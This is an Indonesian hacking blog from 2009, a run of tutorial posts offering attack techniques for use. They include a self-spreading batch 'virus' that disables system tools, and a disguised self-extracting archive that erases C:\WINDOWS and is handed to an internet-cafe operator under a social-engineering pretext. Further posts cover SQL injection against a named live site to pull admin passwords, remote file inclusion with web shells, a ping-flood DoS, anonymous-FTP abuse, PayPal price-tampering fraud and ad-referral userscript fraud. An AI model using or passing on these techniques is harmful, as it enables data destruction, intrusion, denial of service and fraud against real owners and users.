-[†]- Darkness Hacker -[†]-

Pindah ke http://www.neodark.co.tv/

2009-12-27T11:11:00.002+07:00

Maaf, saya terlambat kasih tau, situs saya diganti domainnya ke http://www.neodark.co.tv/
Blog ini akan saya tutup atau saya akan jadikan redirection.

Sekian dan terimakasih
Hormat
ne0 d4rk fl00d3r aka undead_h4x0r

Ganti hosting...

2009-11-03T20:55:00.002+07:00

Maaf, ya, situs www.darknezzhacker.co.cc ditutup sementara, karena ada pemindahan hosting ya!
Maaf sekali, mungkin saya akan ganti ke Wordpress...
OK, dan penutupan ini bakal dimulai, kapan yak? gak tau juga sih, yang penting, kalo gak bisa diakses www.darknezzhacker.co.cc , domain sementara adalah darknezzhacker.blogspot.com

Bikin Virus Sederhana yuk!

2009-10-31T07:57:00.003+07:00

Virus Development udah males dah di utak-atik lagi... jadi, kita bahas virus disini aja yak...
OK, sekarang kita buka notepad, lalu copas yang dibawah ini:
Echo off

If no exist c:\windows\%0copy0% c:\windows

For %%p in(A C D E F) do copy%0 %%p:

For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat

For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r

REG ADD HKCU\Software\Microsoft\Windows\currentVersion\

Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/vNoFind /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/ vNoRun /t REG_DWORD/d 1/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f

REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\

policies\System/DisableRegistryTools /t REG_DWORD/d 1/f

Shutdown –sd –t 60 –c “Nothing is Secure in this Cyber World, because, nothing's perfect... by ne0 d4rk fl00d3r”-f

Exit

Heheheehehe... yaudah, selamat mencoba!!!
P.S. Kalo mau masukin virusnya lewat flash disk bisa pakek Autorun.inf atau pakek RAR auto start.
---END---
Thanks to: jombi_par
Sumber: http://rahmatvinacerpus.wordpress.com

Lock Web

2009-10-30T17:14:00.003+07:00

Nah, kemaren kan sudah diceritakan tentang Localhost Manipulation, nah, sekarang kita pakek File HOST untuk meng-lock website...
Tutorial:
1. Buka C:\WINDOWS\system32\drivers\etc
2. Buka file HOST dengan Notepad
3. Akan keluar seperti ini kan:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

Tambahin bawahnya 127.0.0.+1 diatasnya spasi link yang mau dilock, contohnya jadinya begini:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost
127.0.0.2 http://www.facebook.com
127.0.0.3 http://www.google.com
127.0.0.4 http:/www.kaskus.us

Dan seterusnyah........ abis itu, jangan lupa disave!
4. Buka aja Facebook sekarang, nanti ada tulisan seperti ini:

Unable to connect

Firefox can't establish a connection to the server at http://www.facebook.com

* The site could be temporarily unavailable or too busy. Try again in a few
moments.

* If you are unable to load any pages, check your computer's network
connection.

* If your computer or network is protected by a firewall or proxy, make sure
that Firefox is permitted to access the web

Sama halnya dengan Google, dan Kaskus, tulisannya mirip-mirip lah... ^_^
Sekian......
---END---
Thanks to: SATANIC_H4X0R

Deathly Dork untuk deface...

2009-10-27T18:52:00.002+07:00

Akhirnya, setelah sekian lama, saya tidak blogging lagi, karena ~~lupa password blogger~~ gak ada bahan ~~obrolan~~ blogging...
Dan sekarang ada bahan nih, tentang Google Hacking.
Kan kalo mau melakukan Remote File Inclusion aka RFI kan harus nanem ~~padi di sawah~~ shell dan agak susah, kita akan mempelajari RFI cara gampang (dengan cara memakai shell taneman orang lain... :D)
Hanya dengan dork: "c99shell v. 1.0 pre-release build"
Kita bisa mendapatkan shell taneman orang laen... :D
Lalu kita langsyungz take over ajah... :D :D :D
Sekian...
---END---
Thanks to: cybermutaqqin

ASP Injection

2009-10-24T07:43:00.003+07:00

Kita akan mempelajari ASP ~~Injek-injek~~ Injection
Tutorial aja deh langsyungz.................
1. Cari target dulu dengan dork: inurl:default.asp?newsID=
2. Misalnya dapet target www.situs.com/default.asp?newsID=123
3. Tambain ' (single quote) dibelakang angka, akan keluar seperti ini:

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号

/new_show.asp，行 89

4. Jika keluar kata-kata diatas, maka, kita tambahin ini untuk mencari bugnya: having 1=1 . jadinya begini: www.situs.com/default.asp?newsID=123 having 1=1 maka keluarnya adalah:

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/new_show.asp，行 89

5. Ketemu columnnya kan? ntuh dia si main.id
6. Masukin dibelakangnya: group by "column-nya" having 1=1;– Columnnya diganti column yg diatas itu, dalam kasus ini, columnnya main.id jadi begini: www.situs.com/default.asp?newsID=123 group by main.id having 1=1;– maka keluarnya adalah:

Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效，因为该列既不包含在聚合函数中，也不包含在 GROUP BY 子句中。

/new_show.asp，行 89

7. Ketemu titlenya... hehehehe.... (yang 'main.title')
8. Langsung aja Update dengan menambahkan: update main set title=’hacked by YOU’ jadinya, URLnya begini: www.situs.com/default.asp?newsID=123 update main set title='hacked by YOU' dan liat halaman utamanya.........
Sekian....
---END---
Thanks to: anak|jendral, Jo2, Hmei7, SATANIC_H4XOR

Desain Logo Tecon (isenk-isenk...)

2009-10-21T17:35:00.002+07:00

Kemaren ada sayembara membuat logo tecon, jadi saya bikin aja dah... :D

Selamat menikmati... (HALAH! emank makanan??? ^_^)
---END---

FTP Attack

2009-10-18T21:42:00.003+07:00

FTP (File Transfer Protocol) adalah Protocol khusus untuk File Transferring, jadi, FTP tidak bisa diakses lewat HTTP Protocol...
FTP Attack mengandalkan kelalaian admin dan kelalaian itu bisa membuat attacker Upload Download di FTP secara seenaknya dengan "Anonymous User"
Bagaimanakah caranya?
Letz go to Tutorialz...
1. Buka CMD aka Command Prompt
2. ketik di cmd ftp situs target.anda misalnya: ftp darknezzhacker.co.cc (maaf, blog saya gak bisa diserang! ^_^) tanpa www ya!
3. Jika yang keluar ini:
Connected to situstarget.com.
220---------- Welcome to PureFTPd 1.0.12 ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 15:21 and the load is 0.03. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (situstarget.com:(none)):

Berarti kamu beruntung dan bisa masuk

Kalo yang keluar seperti ini:
Connected to situstarget.com.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:31. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 30 minutes of inactivity.
User (situstarget.com:(none)):

atau ini:
Connected to situstarget.com.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:119.235.18.72]
User (situstarget.com:(none)):

Berarti gak bisa :( cari target lain okay?
4. Jika tampilannya seperti paling atas, berarti anda bisa masuk sebagai "Anonymous User" cara masuknya adalah isikan User Anonymous dan Password kosongkan saja...
5. Sudah masuk? OK, terserah apa kata hati anda, anda bisa melakukan Upload atau Download, atau liat-liat Directory dengan command-command yang sudah dirangkum disini: FTP Command maaf ya kalo bahasa ~~Linggis~~ Inggris, semoga ngerti ya, AMIIIN!

OK, sekian dulu yaah...
---END---
Thanks to: Ciebal dan S'to (lewat Bukunya: CEH)

Enskripsi File menjadi image

2009-10-16T19:03:00.002+07:00

Dari Ciebal...

Bagaimana cara memasukkan file rar ke file gambar?
Sangat gampang... hanya bermodal CMD aka Command Prompt dan pastinya file-file sepert:
- file.rar (ato terserah)
- format.gif
- hasil.gif
(semuanya tempatkan di desktop)
Tutorial:
1. buka cmd
2. ketik cd desktop (untuk mengarahkan cmd ke desktop)
3. lalu ketik: copy /b format.gif+file.rar hasil.gif
4. klikz Enter
5. dan TA-DA! selesai deh... di hasil.gif sekarang terdapat file.rar untuk melihat hasilnya, klik kanan hasil.gif dan open with WinRAR

OK sekianz...
---END---
Sumber: www.ciebal.web.id
Thanks to: Hacker Center and Ciebal

UserScript untuk mencurangi KumpulBlogger

2009-10-16T17:34:00.003+07:00

Sering banged yea saya ngisengin system... tapi inilah nafsu seorang Newbie... (Halah! apa sih? wkwkwk...)
Taudah, kita akan bahas caranya...
Jadi, tadi itu gempa... (Halah! Udah! Udah! jangan bahas gempa deh...)
OK, it's time to serious! Jadi, kita akan sedikit Social Engineering kepada beberapa orang... (sedikit nakal) menarik orang-orang untuk memakai UserScript kita!
Misalnya:
- Kamu promosiin UserScript kamu di Facebook dengan kedok bisa ganti template facebook, dll.
- Di MafiaWars fans, dengan kedok UserScript Bots
- Di Travian Cheater ato Travian Fans dengan kedok untuk bermain Travian dengan mudah...
- dan laen-laen

Saya mendapat ide ini dari Cruz3N Tecon yang membuat Klik Otomatis KumpulBlogger tapi saya akan membahas tentang trik saya sendiri...(saya harus tetap eksiz... )
Wokeh, letz go tentang logikanya
Kita akan redirect pengguna dari Facebook dan penjuru subdomain dan sejuta pagenya, lalu google, fiendster, my space, youtube, ~~me and you everybody you too!~~ dan laen-laen ke link refferal KumpulBlogger cara mendapatkan linknya adalah anda klik kanan iklannya (saya sarankan text ads karena ads yg bergambar ganti-ganti lebih sering) lalu Copy Link lalu paste di Notepad dulu...
Lalu anda buat suatu file di Notepad, Source Code:
// ==UserScript==
// @name KumpulBlogger
// @author ne0 d4rk fl00d3r
// @description XWET
// @include *.facebook.com/*
// @include www.facebook.com
// @include *google.*/*
// @include www.youtube.com/*
// @include *.friendster.com/*
// ==/UserScript==
document .location="javascript:popUpWindow('URL reff KumpulBlogger anda', 0, 0, 536, 580)"

Wkwkwk, ntuh script untuk buka pop-up window yang keluar adalah reff Link KumpulBlogger anda kan bakal makin kaya... wkwkwk....
OK, sekian dah...
---END---

Keyboard Rusak?

2009-10-13T17:58:00.003+07:00

Tadi ada sedikit kepanikan yaitu Keyboard Komputer saya rusak, sementara pembantu saya pergi beli batere, saya masih berselancar, ada 2 cara untuk mengetik URL tanpa keyboard:
1. Virtual Keyboard
Tau kan Virtual Keyboard? Kita bisa mengetik dengan mengklik tombol-tombol di monitor...
2. Copy-Paste Technique
Baru tau tekhnik ini? Tekhnik ini adalah tentang Copy-Paste huruf-huruf yang bertebaran di komputermu, contoh: kamu ke HELP di app apa aja, trus anda copas aja hurufnya atu2 ke address bar... (HEHEHE)
"Wow! Trik bodoh tapi berguna..."
~ Somebody to ne0 d4rk fl00d3r

Udah dulu yeah...
(Mau belajar dulu, besok masih UTS, doakan aku teman-teman... ^_^)
---END---

Destroy the Admin's Computer!!! plus seisi Warnet!

2009-10-12T17:46:00.005+07:00

Wew, ada trick baru neeh tapi Untested dan 30% kita ikut menjadi korban :'(
Tapi itu bisa dibayar dengan "mungkin" warnet gratis atau kehancuran warnet (karena kompi admin harus install ulang)
KHUSUS UNTUK ORANG-ORANG BERKEPERLUAN UNTUK MENGHANCURKAN WARNET!!! (Tapi maaf, saya tidak bertanggung jawab bila ada kesalahan... No Pain, No Gain aka ~~gak ada si Pain, gak bakal jadi kuat loe...~~ Gak ada luka ya gak bakal maju)
To de poin...
OK, pertama kita buat file cmd dl0, dengan Notepad, isinya:
erase C:WINDOWS
lalu save dengan nama: tugas.cmd (nama untuk penyamaran supaya gak dicurigain sebagai "destroyer file")
Lalu, trik supaya nyala ntuh file, maka kita masukkan kedalam file RAR dan diset begini:
- Supaya anda gak dicurigain, supaya ada file buat kedok print, jadi loe masukin file menyerupai tugas seperti copas artikel yang berguna, trus kamu jadiin RAR (satuin sama tugas.cmd) misalkan namanya tugas.doc dan laen-laen
- Pilih tugas.cmd dan tugas.doc lalu klik kanan pada file lalu klik WinRAR lalu pilih Add to Archive
- Isi Archive name terserah (mungkin tugas.exe atau apalah...) lalu centang Create SFX Archive
- Klik Tab Advanced lalu klik tombol SFX Options... lalu isikan Path to Extract jadinya C:/Documents and Settings lalu Isikan "Run after Extraction" "tugas.cmd"
- Lalu klik tab Modes lalu pilih opsi Hide All dan Overwrite all files
- Klik OK untuk memulai Packing!

Mulailah sedikit Soceng (hehehe, ini adalah aksi yang paling menegangkan, kalo gagal, ya paling kamu diblack-list ama admin... dan gatot dah... (gagal total))
HACKER vs Operator
OK, anda pura-pura pengen print, dialognya kayak gini:
Ket: H: Kamu Op: Operator
H: Mas, mau ngeprint (sambil menyodorkan flash disk)
Op: (Colok flash disk) Filenya yang mana de?
H: Yang tugas tapi diextract dulu
Op: (extract)
H: Kayaknya langsung diextract ke Documents and Settings deh...
---File cmd attack---
---Print---
H: Trima kasih

Abis itu Warnet pun Game Over setelah restrart (ato langsung? gak tau juga deh...)
===GAME OVER===
OK, selesailah sudah Wicked Trick ini
Selamat Menghancurkan...
---END---
Thanx to Ichito-Bandito dan SpyroKiD

Anti Facebook

2009-10-11T10:25:00.002+07:00

Yeah, ada lagi nih UserScript gendeng dari saya...
Anti Facebook yaitu Script untuk mendeny website Facebook dengan meredirect ke www.google.com (beserta IP server dan segala penjuru subdomainnya)
Kegunaan:
- Kalo dikantor biasanya kita harus ngeblock fb supaya kinerja karyawan dan karyawati meningkat
- Triple Protection:
+ Block situs facebook dari access
+ Block IP server facebook dari access
+ Block lewat UserScript gw

Install aja dari sini: Anti Facebook

---END---

Directoryku yang baru

2009-10-10T22:18:00.003+07:00

Curhat dulu yuk!
Tadi pas pengen upload shell-shell yang gw dapet di 000webhost, tapi kalo pakek ftpnya dia harus pakek domain laen, gak bisa pakek domain gratisannya dia :'( Harus pakek domain laen... Pas diregist di .co.cc, trus gw bingung cara pakek domainnya di 000webhost, gw harusnya ngesetnya pas pertama kali gw bangun ntuh website, yaudah, gw masukin ke parked domain en, malemnya, JREEENG!!!

....

.....

Bisa? GAK BISA!!! tetep yang keluar ngaco!! shell gw gak bisa dibuka (NTOD!)
Yaudah, segeralah tinggalkan 000webhost yang sedikit sinting tersebut dan memulai ~~hidup baru di freehostia~~ eit, freehostia terlalu aneh, soalnya suka delete website orang yang gak berdosa... (yang gak berdosa aja didelete, apalagi web yang isinya shell semua?) jadi, memulai lagi di ucoz (sama aje donk...)
OK, kalian bisa ambil shell dari website saya (gratis!*)
*Belum termasuk biaya akses internet (^_^)

OK, langsung aja ke TKP gan... Neo Directories

---END---

Penghancuran Warnet (Hanya sedikit pemikiran dari otak kami)

2009-10-10T16:57:00.004+07:00

Gambar diatas adalah sedikit pemikiran saya dan teman saya di Tecon (Sebenernya temen satu sekolah ^_^) yang namanya Criszz (Nama Handle) Memang hancur gambarnya, dan saya akan menjelaskannya:
1. Satu orang utusan Hacker pergi ke warnet target. (Pastikan warnet target memakai LAN)
2. Utusan Hacker itu mendapatkan IP address
3. Utusan Hacker itu mengirimkan IP Address ke komputer Hacker
4. Hacker mendapat IP address (misalnya IP address-nya: 111.666.230.81)
5. Karena warnet itu memakai LAN, mereka punya 1 IP Address untuk 7 komputer (di gambar)
6. Hacker melakukan DoS ke target dengan memasukkan ~~jari ke saklar~~ command ini ke cmd aka Command Prompt: "ping 111.666.230.81 -l 65500 -n 10000000 -w 0.00001" (Tanpa tanda kutip)
7. Koneksi Warnet pun lumpuh... dan...

======-&gtGAME OVER&lt-======
Warnetnya sudah game over (kalo si Hacker baek sih, gak game over ^_^) tergantung Hackernya, kalo jahat ya didiemin terus sampe besok pagi... :D
Jadi, saya juga mengajarkan tentang DoS dengan Command Prompt yaitu dengan memakai command ini: ping IP -l 65500 -n 10000000 -w 0.00001
IP diganti IP target.
Dijamin jaringan internet dia lumpuh dan game over
NOTE: Bisa juga targetnya website!
---END---

UserScript Anti Tunggu Download Free User Rapidshare dan 4shared

2009-10-08T18:53:00.004+07:00

Setelah 3 Hari membuat UserScript buat akalin Timernya Rapidshare secara Otomatis (Thx to SpyroKiD)
Karena Judulnya aneh, mohon dimaklumi, karena saya tidak terlalu pintar untuk membuat judul yang pas...
History Version UserScript (from zero to HERO :D) dari waktu ke-waktu:
1. Cuma pakek JavaScript ini: javascript:alert(c=0) ternyata gagal karena JavaScript itu aktif pertama kali lalu Timernya telat keluarnya, jadi gak bisa dijadiin 0 deh...
2. Pakek JavaScript sleep() dan wait() (Untuk tunggu sebelum JavaScript aktif) ternyata gak bisa karena gw gak bisa pakek javascriptnya...
3. Yang berhasil: pakek redirection! redirectnya ke javascript:alert(c=0) (Hahaha)

Itulah historynya... dan saya akan membagikannya untuk anda semua sekalian...
USERSCRIPTNYA
Sudah dulu yeah...
---END---
Thanks to: SpyroKiD yang udah kasih tau tentang kelemahan Rapidshare...

Tutorial RFI (Yang ditunggu-tunggu dan dinanti-nanti)

2009-10-05T21:09:00.004+07:00

Akhirnya Update juga, setelah jalan-jalan dari Yogyacarderlink (ternyata isinya orang gila semua! piis om-om ~~gay~~ dari Yogyacarder! ^_^ Ane gak maksud untuk menjelek-jelekkan ^_^ ^_^ ^_^)

RFI adalah: Remote File Inclusion, yaitu Suatu teknik Hacking dengan meng-include-kan file ke suatu website yang ada bug RFI-nya lewat backdoor (jalur belakang aka pintu belakang)

Macam-macam Backdoor aka Web Shell:
1. c99.txt
2. c100.txt
3. r57.txt
4. ekin0x
5. locus7
Darimana anda bisa mendapatkannya yaitu tempat yang hanya 6 huruf: G-O-O-G-L-E

Tutorialz:
1. Sebelum melakukan RFI, ada baiknya kita persiapkan diri:
- Berdoa menurut kepercayaan masing-masing
- Web Browser
- Shell yang udah didapatkan (kalo dapet dari punya orang laen, mending dicatet URL-nya, soalnya kita bakal pakek buat RFI-nya, kalo punya sendiri, upload dulu ke hostingan dan saya anjurkan untuk ~~meminumnya 3x sehari supaya efeknya 100%~~ memakai hosting 000webhost.com atawa freewebtown.com kalo gak mau suspend dengan cepat dan mudah, sangat tidak dianjurkan untuk ~~bertemu Roy Suryo~~ memakai freehostia karena menurut para ~~gay~~ warga Yogyacarderlink freehostia upload shell langsung disuspend... lalu anda catet URL-nya, nanti bakal dipakek)
- akses ke milw0rm/Kumpulan Bug RFI (dipilih aje atu2)
2. Buka milw0rm lalu cari bug RFI (di search ketik: RFI) lalu ambil salah satu bug RFI.... atawa kalo udah dapet bug RFI, yaudah...
3. Search digoogle Bugsnya misal exploitna: admin/aaa/direktori/direktori2/file=[shell] ya carinya inurl:admin/aaa/direktori/direktori2/file=
4. Comot satu target (bahasanya ambhuradhul) misalnya dapet: www.target.com/admin/aaa/direktori/direktori2/file=tolol.txt
5. Ganti tolol.txt jadi URL shellnya, jadinya begini: www.target.com/admin/aaa/direktori/direktori2/file=www.situsgue.hosting.com/shell/c99.txt? (jangan lupa ditambah "?" tanpa tanda kutip (Tanda tanya))
6. Kalo gak keluar shellnya (ada fasilitas Upload dan buat Masukin Codenya, pokoknya mirip-mirip FTP Manager gituu...) berarti gak vuln lagi, jangan sedih dan marah, cari aja yang laen... ^_^ kalo keluar shellna, lanjoet aje... tinggal kita takeover ntu wepsait... (NGIHAHAHAHAHA!!!)
7. Kita pakek command-command berikut buat takeover:
Uname -a = Melihat jenis or nama server or type server yg di gunakan !!!!
cat /etc/issue = melihat jenis kernel dari suatu server !!!!
curl -o , wget , lwp-download = mendownload sebuah file
find = mencari ( tampilkan , temukan )
8. Terserah mahu ngapain (logatnya mulai agak najis... ^_^)
---END---
Thanks to: kiddies dan ycl dari Yogyacarderlink
Sumber: yogyacarderlink.web.id

UserScript Isengin temen yang pake Gmail

2009-10-02T20:00:00.005+07:00

Udah lama gak update blog jelek ini selama 2 hari (2 hari itu lama apa bentar ya?)
OK, saya langsung aja, saya melihat SpyroZone Update lagi! (Cihuuy! Akhirnya!) setelah beberapa hari yang lalu yaitu sekitar 2 bulan yang lalu (2 bulan itu bentar apa lama seeh???) dan Updatenya adalah: Malicious User Script! Hati-hati dengan Browser anda, karena anda bisa terbunuh olehnya...
Sebelum kita sharing Malicious User Script, Apakah itu UserScript?
Menurut Wikipedia ala saya (Halah...): User Script adalah JavaScript yang sudah diset oleh pengguna untuk Browsernya, supaya JavaScript itu aktif PERTAMA KALI (PERTAMAX! katanya Kaskuser) di beberapa situs yang diinginkan.
Contoh penggunaan User Script:
- Mengganti tampilan Google jadi lebih indah
- Mengganti tampilan Gmail jadi lebih indah
- Menambahkan Fasilitas di Blogger yaitu Emoticons
- Bot untuk MafiaWars di Facebook (biar maennya otomatis, kita gak perlu maen, biarkan bot itu yang mengerjakannya ^_^)
- dan lain-lain, liat aja di userscripts.org

Browser yang Support User Script:
- Opera: Secara Default udah ada...
- Mozilla Firefox: Pake Add-Ons Greasemonkey
- Internet Explorer, Google Chrome, Safari: Tanya om google tentang add-onsnya

Taukah anda bahwa kita bisa memakai UserScript untuk hal yang sangat MENGERIKAN! Hahahahahaha!!!
Misalnya: Windows bisa macet gara-gara buka tab terus, atau yang kita bicarakan sekarang, yaitu: INBOX GMAIL BOMBER (Bikin-bikin ndiri namanya... ^_^)
OK, source code didapat dari SpyroKiD pastinyah!!!
SOURCE CODE

Yea, segitu aja dulu yea...
OK, Stay on your channel in darknezzhacker.co.cc
There's more tips and trick or tutorial in Darkness Hacker...
So stay Hacking! ;)
---END---
Sumber: spyrozone.net

Cara ganti harga Paypal jadi $0.01

2009-09-29T18:23:00.000+07:00

Jadi begini, kita bisa bayar beli barang dengan paypal tapi diganti harganya jadi $0.01...
Ini langkahnya:
1. Lalu cari situs yang jualan barang di internet yang pembayarannya menggunakan PayPal, lalu klik “Buy”
2. Trus klik "Checkout with PayPal"
3. Dan saat keluar teks "You are being automatically forwarded to PayPal's site" lalu cari di browser Mozilla Anda pada menu “View” trus "Page Source" atau tekan “ctrl+U”
4. Simpan source teks tersebut dengan klik "File" lalu "Save page as..."
5. Putuskan koneksi ke internet dan buka kembali file source yang telah Anda “save” tadi, lalu ganti – harga ="49.95 (atau harga barang)" -- dengan – harga ="00.01" –
6. Trus “save”
7. Lalu klik kanan file source tadi dengan "Open with" -- "FireFox"
8. Selanjutnya terserah Anda …

Selamat Mencoba …
Semoga bermanfaat

Gw gak bertanggung jawab kalo ada kesalahan atau terjadi kejadian
---END---
Thx to: Kimmo (heckeria.net)

Blind SQL Injection

2009-09-28T15:42:00.003+07:00

Akhirnya, setelah 2 hari mandul karena sibuk deface sana-sini, tapi gak ada hasil... :-(
Yaudah lah, karena saya lebih suka dapet tantangan "deface 5 web dalam 1 bulan! INGAT! jangan pake XSS!!!" daripada ngga, soalnya gak tau mo ngapain, selain blogging dan forumming, yep, secara tidak langsung, Indeves telah memberikan tantangan kepada saya minimal 2 web kedeface tanpa menggunakan XSS!

OK, back to topic aja deh...

Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: http://www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1

http://www.smanti.com/berita.php?id=5 and 1=0 false

http://www.smanti.com/berita.php?id=5 and 1=1 true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) masih false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) masih false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) masih false

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

http://www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)

lanjutin trus langkah2na..

cari value k 3 user..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

http://www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..

pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

http://www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi

http://www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba wkwkwkw...

Thanks smua..duduw..wkwkw sekian...
---
Ditulis:Neo_Gabriel
Sumber: senot

Saya mendukung Indonesian Security Confrence

2009-09-27T10:40:00.002+07:00

Aku mendukung Idsecconf 2009!

Yeah, saya memang sangat mendukungnya...
Saya liat di idsecconf.org banyak blog yang sejenis sama blog Darkness Hacker ini. Jadi saya ikut mendukung aja deh (tapi gak tau ikut kesana apa ngga... ^_^)
OK, kalo kalian mau dukung pergi ke 2009.idsecconf.org dan klik Dukung Kami, trus copas code banner yang dikehendaki, dan jangan lupa kirim email pemberitahuan ke idsecconf[at]echo[dot]or[dot]id

Udah deh gitu doank

NEW DEFACED GUESTBOOK!!!

2009-09-25T17:31:00.002+07:00

YEAH! Akhirnya Cybernet Warrior beraksi untuk kesekian kalinya (cuma dua kali sih... ^_^)
Wokeh, Saya akan sedikit pamer...
Shoutz to: J4mbi H4ck3r
HACKED GUESTBOOK

Xixixixi...
Maaf yaa Malaysia...
---END---

Secret Code HP Nokia

2009-09-25T12:51:00.001+07:00

